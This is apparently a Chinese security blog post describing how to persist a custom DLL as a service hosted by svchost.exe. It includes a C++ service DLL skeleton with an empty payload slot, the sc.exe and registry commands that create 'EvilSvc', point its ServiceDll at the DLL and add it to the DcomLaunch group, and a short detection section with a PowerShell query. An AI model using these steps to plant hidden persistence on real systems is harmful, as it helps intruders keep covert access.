svchost.exe挂载DLL

  1. 工作原理
  2. 实验过程

工作原理

实验过程

用 VS 新建类库项目，编译一个处理服务控制循环响应的 DLL

#include "pch.h"
#define SVCNAME TEXT("EvilSvc")


// Status block reported to the SCM; file-scope so the control handler, the
// worker and ServiceMain all update the same record. As a global it is
// zero-initialised, so dwControlsAccepted stays 0 unless set elsewhere
// (nothing in this listing sets it).
SERVICE_STATUS serviceStatus;
// Handle returned by RegisterServiceCtrlHandler in ServiceMain; every
// SetServiceStatus call in UpdateServiceStatus goes through it.
SERVICE_STATUS_HANDLE serviceStatusHandle;
// Manual-reset event created in ExecuteServiceCode and set by ServiceHandler
// on STOP/SHUTDOWN; the worker waits on it before reporting SERVICE_STOPPED.
HANDLE stopEvent = NULL;


// Record currentState in the shared status block and push the whole block to
// the Service Control Manager through the handle obtained in ServiceMain.
// The result of SetServiceStatus is not checked, so a report made through an
// invalid handle (e.g. before registration succeeded) fails silently.
VOID UpdateServiceStatus(DWORD currentState)
{
    SERVICE_STATUS *status = &serviceStatus;
    status->dwCurrentState = currentState;
    SetServiceStatus(serviceStatusHandle, status);
}


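// Control-request callback registered in ServiceMain.
//
// controlCode: the SERVICE_CONTROL_* request delivered by the SCM.
// eventType, eventData, context: unused. The function has the four-argument
//   (Ex-style) handler shape but is registered through the single-argument
//   RegisterServiceCtrlHandler via a cast (see ServiceMain), so these values
//   are not supplied by the SCM.
// Returns NO_ERROR for every request, including unrecognised ones.
//
// Fix relative to the original listing: the state reported after the switch
// is the one the case actually set, instead of an unconditional
// SERVICE_RUNNING that contradicted a PAUSE. STOP/SHUTDOWN no longer write
// SERVICE_STOPPED here; they only signal stopEvent, and ExecuteServiceCode
// reports the final SERVICE_STOPPED once its wait returns, so the SCM sees a
// single stopped report after the worker has unwound. (A SERVICE_STOP_PENDING
// acknowledgement would be the textbook intermediate state; it is not used
// here to keep to the names the listing already relies on.)
DWORD ServiceHandler(DWORD controlCode, DWORD eventType, LPVOID eventData, LPVOID context)
{
    (void)eventType;
    (void)eventData;
    (void)context;

    switch (controlCode)
    {
        case SERVICE_CONTROL_STOP:
        case SERVICE_CONTROL_SHUTDOWN:
            // Wake ExecuteServiceCode; it owns the transition to SERVICE_STOPPED.
            SetEvent(stopEvent);
            break;
        case SERVICE_CONTROL_PAUSE:
            serviceStatus.dwCurrentState = SERVICE_PAUSED;
            break;
        case SERVICE_CONTROL_CONTINUE:
            serviceStatus.dwCurrentState = SERVICE_RUNNING;
            break;
        case SERVICE_CONTROL_INTERROGATE:
            // Nothing changes; the current state is re-reported below.
            break;
        default:
            // Unknown control: acknowledged with the current state, no error.
            break;
    }

    // Acknowledge the request with whatever state now holds.
    UpdateServiceStatus(serviceStatus.dwCurrentState);

    return NO_ERROR;
}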


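// Body of the service: reports RUNNING, blocks until the control handler
// signals stopEvent, then reports STOPPED.
//
// Writes the file-scope stopEvent. The manual-reset event created here is
// never closed; the original listing did not close it either, and this
// rewrite keeps to the names the listing already uses (no CloseHandle).
//
// Fix relative to the original listing: the CreateEvent result is checked.
// When no event can be created the service reports SERVICE_STOPPED at once
// instead of reporting RUNNING and then waiting on a NULL handle (the wait
// failed immediately, so the service stopped only by accident). The
// `while (1)` that returned on its first pass is replaced by a single wait.
VOID ExecuteServiceCode()
{
    stopEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
    if (stopEvent == NULL)
    {
        // Without a stop signal the worker could never be told to exit.
        UpdateServiceStatus(SERVICE_STOPPED);
        return;
    }

    UpdateServiceStatus(SERVICE_RUNNING);

    // The original listing leaves a placeholder at this point for the work
    // the service is meant to perform; this skeleton executes nothing here.

    // Block until ServiceHandler sets stopEvent (STOP or SHUTDOWN). The wait
    // result is deliberately not inspected: any outcome ends the service.
    WaitForSingleObject(stopEvent, INFINITE);
    UpdateServiceStatus(SERVICE_STOPPED);
}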


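// Exported entry point that svchost.exe resolves from the DLL named in the
// service's Parameters\ServiceDll value (the reg add command under the
// listing writes that value).
//
// argC/argV: service arguments passed by the SCM; unused.
//
// Fix relative to the original listing: the handle returned by
// RegisterServiceCtrlHandler is checked. On failure there is no handle to
// report status through, so the function returns instead of passing a NULL
// handle to SetServiceStatus via UpdateServiceStatus.
//
// Left as in the original (no new Win32 names introduced here):
//  - ServiceHandler has the four-argument Ex-style shape but is registered
//    through the single-argument RegisterServiceCtrlHandler via a cast, so its
//    extra parameters are never supplied; on 32-bit builds the missing WINAPI
//    on ServiceHandler is also a calling-convention mismatch.
//    RegisterServiceCtrlHandlerEx is the registration call that matches the
//    handler's signature.
//  - serviceStatus.dwControlsAccepted is never set and stays at its zero
//    initial value; with no accepted controls the SCM is expected to refuse
//    STOP/PAUSE/CONTINUE requests for this service (confirm against the SCM
//    documentation), which limits what ServiceHandler can ever receive.
extern "C" __declspec(dllexport) VOID WINAPI ServiceMain(DWORD argC, LPWSTR * argV)
{
    (void)argC;
    (void)argV;

    serviceStatusHandle = RegisterServiceCtrlHandler(SVCNAME, (LPHANDLER_FUNCTION)ServiceHandler);
    if (serviceStatusHandle == NULL)
    {
        // Registration failed: nothing can be reported to the SCM.
        return;
    }

    // Shared-process (svchost-hosted) service; exit-code fields stay zero.
    serviceStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;
    serviceStatus.dwServiceSpecificExitCode = 0;

    UpdateServiceStatus(SERVICE_START_PENDING);
    ExecuteServiceCode();
}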

创建EvilSvc服务

sc.exe create EvilSvc binPath= "c:\windows\System32\svchost.exe -k DcomLaunch" type= share start= auto

将 EvilSvc 的 ServiceDll 路径改为自己的 DLL 路径

reg add HKLM\SYSTEM\CurrentControlSet\services\EvilSvc\Parameters /v ServiceDll /t REG_EXPAND_SZ /d C:\Windows\system32\EvilSvc.dll /f

注册表查看该服务如下

修改svchost组里的DcomLaunch
(添加创建的服务名)

启动EvilSvc服务

sc start EvilSvc

检测技术

* 检查最近创建的服务中以 svchost.exe 作为 binPath 的项
* 列出所有系统服务的 ServiceDll 值并逐一核查（重点关注指向非系统目录或未签名 DLL 的路径）
Get-ItemProperty hklm:\SYSTEM\ControlSet001\Services\*\Parameters | ? { $_.servicedll } | select psparentpath, servicedll



文章标题:svchost.exe挂载DLL

本文作者:九世

发布时间:2022-01-16, 01:28:39

最后更新:2022-01-16, 01:36:01

原始链接:http://422926799.github.io/posts/3047149d.html
